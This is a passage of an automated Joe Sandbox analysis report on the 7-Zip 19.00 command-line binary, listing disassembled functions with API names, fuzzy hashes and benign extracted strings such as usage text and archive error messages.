                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                              • Instruction ID: 347fb17a758893a53e5dd80747e0834115aaa61241fc04ac7826f7475f608da5
                                              • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                              • Instruction Fuzzy Hash: 85910733306A8586CA24EF36D164A6F6760F787F8AB055457DF4E53712CE6CC44ACB09
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                              • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                              • API String ID: 600854398-319139910
                                              • Opcode ID: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                              • Instruction ID: 338f3385b775dafe1b6808f5b858c5f89d224fba489c51c1bedce847029085ad
                                              • Opcode Fuzzy Hash: d7f8a16aaa2cb06036e5352a6df670f190340cc497d1c3e3751f8c418c22ba6f
                                              • Instruction Fuzzy Hash: 3D519FA5301A8195EE20DFA6F88079A6760F789B84F45403ADE4D83769EF3CC54DC748
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrowmallocmemmove
                                              • String ID:
                                              • API String ID: 3352498445-0
                                              • Opcode ID: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
                                              • Instruction ID: 735126f20f67b913276177252a96e69cd0415184b669970757347ec10936726e
                                              • Opcode Fuzzy Hash: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
                                              • Instruction Fuzzy Hash: 63E1C333704A9186CA30EE16E5811DFA760F386BD5F45812BEF9D57716CEACC84ACB48
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove$ExceptionThrow
                                              • String ID: incorrect update switch command$pqrxyzw
                                              • API String ID: 3957182552-3922825594
                                              • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                              • Instruction ID: 30364346d2f23de5e58c6e7558efdfb10df38552c07cc49a27bbd9b8369daae5
                                              • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                              • Instruction Fuzzy Hash: 51817F2321598592CB20EF26D88176F7320F7C6B89F405127AF8E47766DE7CC94ACB49
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove$wcscmp$ExceptionThrow
                                              • String ID: Empty file path
                                              • API String ID: 462375450-1562447899
                                              • Opcode ID: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
                                              • Instruction ID: 9742a3bcd91a3ad98dcd212aa7a1d4a9e5ae018727986254bfcb0eb77302ff33
                                              • Opcode Fuzzy Hash: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
                                              • Instruction Fuzzy Hash: FDD1A033214A8086CB20EF26D49136FB760F78579AF544127EE9947B5ADF7CC949CB08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \$\\?\$\\?\UNC\
                                              • API String ID: 0-1962706685
                                              • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                              • Instruction ID: ed07a47917400490563e39b3ec94f87dd2372bbc89114657cd1254167dd826a9
                                              • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                              • Instruction Fuzzy Hash: DEB18122209940A0CE20FF22D56156FA720EB927CAF445217FE4A47767DF6DC95FCB0A
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00451C98
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00451CB9
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
                                              • Instruction ID: 3fe3ae9b0ecbe3e8eb2873f0f251bb94e0507347c4258155e180cfe4e0bb89ef
                                              • Opcode Fuzzy Hash: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
                                              • Instruction Fuzzy Hash: FFA18E2264964081CA20AF16E59166FB720E7D3796F441117FF9E43B7ADE6CD88ECB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                              • Instruction ID: 2acfe24190dbe93f15710adc3285f97b7993b89738cb6ef7c290c659c0ef2623
                                              • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                              • Instruction Fuzzy Hash: 27518F27712E8089CB20EE36D95126B2720F797F99F19017BDF2D1B71ADF68C8068718
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free$fputc
                                              • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                              • API String ID: 2662072562-1527772849
                                              • Opcode ID: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                              • Instruction ID: 655d71c92c86cea66cb2db9184d27a0a5a6a6dd0f625a78439c4b3e049b3a1d5
                                              • Opcode Fuzzy Hash: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                              • Instruction Fuzzy Hash: 3F519E6630450096CE21EF22E69436F6721FB85BD9F45423BEE6E03B66DF2CC949C309
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-0
                                              • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                              • Instruction ID: a58652d3553b44c79631db2791e0c699e2a44210d97f39550ba72185a76fb14c
                                              • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                              • Instruction Fuzzy Hash: 44718422315A8181CA20EF26E55129FA720F7C27D5F505127FF9E5776ADF6CC84ACB08
                                              APIs
                                              • free.MSVCRT ref: 0048187D
                                                • Part of subcall function 00452130: malloc.MSVCRT(?,?,?,?,00452FDA,?,?,00000000,00000000,0045329F), ref: 00452134
                                                • Part of subcall function 00452130: _CxxThrowException.MSVCRT ref: 0045214F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrowfreemalloc
                                              • String ID:
                                              • API String ID: 2861928636-0
                                              • Opcode ID: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
                                              • Instruction ID: 4db34248147873654545e8238f02557a825b1a5913603e6aeb07e6422eeee086
                                              • Opcode Fuzzy Hash: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
                                              • Instruction Fuzzy Hash: BE81567230AAC581CA20EB26E550BAF6764F796B89F015457DF8E53B15CF7CC44ACB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                              • Instruction ID: 18859030b76dc819bd292c11d223846e8d98acf4863b5c1c718e9a936be94829
                                              • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                              • Instruction Fuzzy Hash: 5831EB23712D4185CA11FF37CE512AE2320EB82F99F19017B9F2D4B35ACEA8C8468758
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID: 2$3$?$?$Z
                                              • API String ID: 1534225298-3338962022
                                              • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                              • Instruction ID: d535f5464744421f95d6a907e1670cbb78a68a7a6cd6312b10e6a455ddb5d9ba
                                              • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                              • Instruction Fuzzy Hash: 0AC1A533215A8492CA30FB26D88456F6721F7D5B89F404A17EB9E4376ADF3CC949C709
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                              • Instruction ID: dcc18f0649f26686e9c4f33b4b3fa1aa27a2b5122d013fb5c5774ce35800e349
                                              • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                              • Instruction Fuzzy Hash: E4511C33702E8089CB15EE36D59466E6320FB86F9AB194177DF1E1B719DF28C909C319
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$wcscmp
                                              • String ID: ..\
                                              • API String ID: 4021281200-2756224523
                                              • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                              • Instruction ID: dc06f926d7eb9c64d8e91b655ef47152bde4bab68cdbb50ca45cc3459fe40cc2
                                              • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                              • Instruction Fuzzy Hash: 35616023716A8086CA24EE16E49021F7721FBC6B99F590127EF4E17759DF7CD846C708
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free$fputc
                                              • String ID: Modified: $Path: $Size:
                                              • API String ID: 2662072562-3207571042
                                              • Opcode ID: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                              • Instruction ID: c6a9d8f2bcd2a4cf3684e365339be821e2f66f2c547449180a9b1f437f52c2ae
                                              • Opcode Fuzzy Hash: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                              • Instruction Fuzzy Hash: FB213EA230090191DE20EB26E95436E2321BBC6BE9F448237EF2D47BA5DF2CC55DC308
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
                                              • Instruction ID: 0bf1c75a07bb3a123f411ccce16f71e4e56187b209e0a87d11c890a22dcd8968
                                              • Opcode Fuzzy Hash: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
                                              • Instruction Fuzzy Hash: 88C17023315A8496CA20EF26D48116E6360F7C6B4AF504127EF4E63B2BCF3DC959CB49
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: hG
                                              • API String ID: 1294909896-2190518894
                                              • Opcode ID: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
                                              • Instruction ID: 8c82c8e7ab844b74c72351c4689a4360f95dad13e1f00910f6b62ab0d8d7f1d8
                                              • Opcode Fuzzy Hash: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
                                              • Instruction Fuzzy Hash: 20E15672315B8096CB54EB26E49475E77A0F789B84F048826EF8E87725DF3DC899C708
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove$ExceptionThrow
                                              • String ID: Incorrect volume size:
                                              • API String ID: 3957182552-1799541332
                                              • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                              • Instruction ID: 30497e5b2362206907600833580c70d7a0230e3402c1021a01d6b213575b1599
                                              • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                              • Instruction Fuzzy Hash: 8D518C72305A8492CB24EF66D8903AEB320F785B88F448127DB9D47766EF6CC949C749
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
                                              • Instruction ID: ecc9c0937db57564a1ce8b74a36561306e9fd6306d477ed004911b7e9739d439
                                              • Opcode Fuzzy Hash: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
                                              • Instruction Fuzzy Hash: 70717022309A4181DB10EF26E55436E7761EB86BDDF040127EF5E87766EF2CC48AC74A
                                              APIs
                                                • Part of subcall function 0045339C: free.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533D7
                                                • Part of subcall function 0045339C: memmove.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533F2
                                              • free.MSVCRT ref: 0045A90A
                                              • free.MSVCRT ref: 0045A9AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID: /$\
                                              • API String ID: 1534225298-1600464054
                                              • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                              • Instruction ID: 60c831c59ca03bbbd0acb3805ff3162901acfa15676147469fafda8a3dbb7059
                                              • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                              • Instruction Fuzzy Hash: 5151A412304A40A18E24EF22D55107E6720EB827DBB44522BBF5E47767DF6CCD5EC70A
                                              APIs
                                              Strings
                                              • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00498630
                                              • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00498640
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$fputs$memmove
                                              • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                              • API String ID: 2337578458-4238946813
                                              • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                              • Instruction ID: 9cd8dff40bcb40f25dd446db8fb9021718664e49c1fe4a55b038ff3f99e0073b
                                              • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                              • Instruction Fuzzy Hash: 2C110D63305A8196DA20DF1AEA9036FB322B786B95F544027CF5D5B719CF3CC89AC709
                                              APIs
                                              Strings
                                              • Cannot find listfile, xrefs: 0045FF12
                                              • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 0045FFDA, 0046000E
